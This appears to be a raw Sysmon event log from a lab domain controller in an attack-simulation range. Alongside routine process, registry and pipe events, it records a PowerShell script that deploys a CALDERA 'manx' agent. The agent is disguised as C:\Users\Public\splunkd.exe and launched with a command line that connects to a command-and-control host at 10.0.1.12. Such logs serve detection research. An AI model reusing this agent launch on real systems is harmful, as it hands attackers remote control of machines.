12:00:54.455{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.455{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:54.393{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:54.393{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.315{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.237{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.244{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.237{266CAFBE-646C-6064-0D00-00000000AE01}612\RpcProxy\593C:\Windows\system32\svchost.exe 13241300x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:54.237{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 17141700x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.221{266CAFBE-646A-6064-0B00-00000000AE01}856\77c0f17c25386996C:\Windows\system32\lsass.exe 17141700x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.221{266CAFBE-646A-6064-0B00-00000000AE01}856\RpcProxy\49675C:\Windows\system32\lsass.exe 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:53.205{266CAFBE-646C-6064-1200-00000000AE01}11961472C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:53.190{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.846{266CAFBE-6473-6064-2600-00000000AE01}30602196C:\Windows\system32\conhost.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.830{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6473-6064-2600-00000000AE01}3060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.830{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.830{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+966df|C:\Windows\System32\shell32.dll+9656c|C:\Windows\System32\shell32.dll+962bc|C:\Windows\System32\shell32.dll+6f987|C:\Windows\System32\shell32.dll+6f8e5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+38b3fc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+af0a27|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+88e1ec9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+88e1ec9d(wow64) 154100x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.786{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 
13241300x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 11241100x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:00:51.580{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-03-31 11:59:34.414 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
